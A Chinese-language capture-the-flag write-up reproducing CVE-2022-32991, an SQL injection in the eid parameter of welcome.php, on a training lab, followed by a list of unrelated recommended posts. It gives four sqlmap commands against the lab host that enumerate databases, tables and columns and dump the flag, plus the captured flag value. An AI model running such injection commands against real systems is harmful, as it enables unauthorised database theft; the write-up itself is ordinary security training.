春秋云境:CVE-2022-32991[漏洞复现]

从CVE官网查询该漏洞相关信息

该漏洞是由于welcome.php中的eid参数包含了SQL注入漏洞

则我们的目标就在于寻找welcome.php地址以及相关的可注入eid参数


开启靶机

先在页面正常注册、登录一个账号。密码随便填

进入了home目录,这里有三个话题可以选择开启

随便选择一个进行开启点击Start即可

进入后查看网页URL

可以看到这里的URL地址就出现了welcome.php和eid参数


使用自动化工具SQLMAP漏洞利用

爆库:sqlmap -u 'http://eci-2zefpkb9jv5uvskqpxyu.cloudeci1.ichunqiu.com/welcome.php?q=quiz\&step=2\&eid=5b141f1e8399e\&n=1\&t=10' -p 'eid' --batch --dbs

拿到了四个数据库,继续选择ctf库进行爆表


爆表:sqlmap -u 'http://eci-2zefpkb9jv5uvskqpxyu.cloudeci1.ichunqiu.com/welcome.php?q=quiz\&step=2\&eid=5b141f1e8399e\&n=1\&t=10' -p 'eid' --batch -D ctf --tables

再继续爆列:sqlmap -u 'http://eci-2zefpkb9jv5uvskqpxyu.cloudeci1.ichunqiu.com/welcome.php?q=quiz\&step=2\&eid=5b141f1e8399e\&n=1\&t=10' -p 'eid' --batch -D ctf -T flag --columns

最后查看flag里面的内容: sqlmap -u 'http://eci-2zefpkb9jv5uvskqpxyu.cloudeci1.ichunqiu.com/welcome.php?q=quiz\&step=2\&eid=5b141f1e8399e\&n=1\&t=10' -p 'eid' --batch -D ctf -T flag -C flag --dump


flag{3b46abc2-3846-417c-84ae-49b54dfdeb7b}

相关推荐
沈浩(种子思维作者)6 小时前
真的能精准医疗吗?癌症能提前发现吗?
人工智能·python·网络安全·健康医疗·量子计算
vortex59 小时前
Wfuzz 全面使用指南:Web 应用模糊测试工具详解
网络安全·渗透测试·kali
汤愈韬10 小时前
NAT策略
网络协议·网络安全·security·huawei
汤愈韬11 小时前
Full Cone Nat
网络·网络协议·网络安全·security·huawei
广州服务器托管12 小时前
NVIDIA最新591.74显卡驱动精简版:支持DLSS 4.5、所有RTX显卡都可使用,最新N卡驱动下载
计算机网络·网络安全·云原生·个人开发·可信计算技术
汤愈韬12 小时前
NAT ALG (应用层网关)
网络·网络协议·网络安全·security·huawei
汤愈韬16 小时前
双向NAT
网络·网络协议·网络安全·security·huawei
2503_9469718619 小时前
【Kernel/Consensus】2026年度第二周内核重构与分布式共识战争基准索引 (Benchmark Index)
网络安全·微服务·重构·数据集·分布式系统·系统内核
Filotimo_19 小时前
桥接服务概念
网络协议·网络安全·信息与通信
枷锁—sha20 小时前
【BUUCTF系列】helloworld 1
安全·网络安全